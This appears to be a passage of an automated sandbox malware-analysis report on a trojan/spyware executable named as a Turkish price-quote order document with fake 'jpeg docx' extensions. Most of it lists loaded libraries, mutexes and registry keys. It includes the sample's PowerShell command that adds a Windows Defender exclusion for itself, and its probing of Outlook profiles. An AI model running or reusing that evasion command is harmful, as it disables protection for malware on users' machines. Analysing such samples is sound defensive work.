                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/11@3/3
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.logJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess320
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\lEpeXavzyJVxriVLRFePJBBIOC
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jboqdnpm.qai.ps1Jump to behavior
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 71%
                  Source: unknownProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 1832
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Windows.Forms.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: Accessibility.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Drawing.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Core.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.pdb4 source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: Accessibility.pdbar source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Configuration.pdbp source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: System.Core.ni.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WERADDE.tmp.dmp.8.dr
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_06C4840E push es; retf C480h5_2_06C48440
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeCode function: 5_2_06C4C1BA push es; ret 5_2_06C4C1C0
                  Source: fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: section name: .text entropy: 7.859436491693461
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi507_ on-san vakum san tic_ sipari#u015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi507_ on-san vakum san tic_ sipari#u015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi507_ on-san vakum san tic_ sipari#u015fi jpeg docx .exe
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi507_ on-san vakum san tic_ sipari#u015fi jpeg docx .exeJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: \fiyati_teklif 65tbi507_ on-san vakum san tic_ sipari#u015fi jpeg docx .exeJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
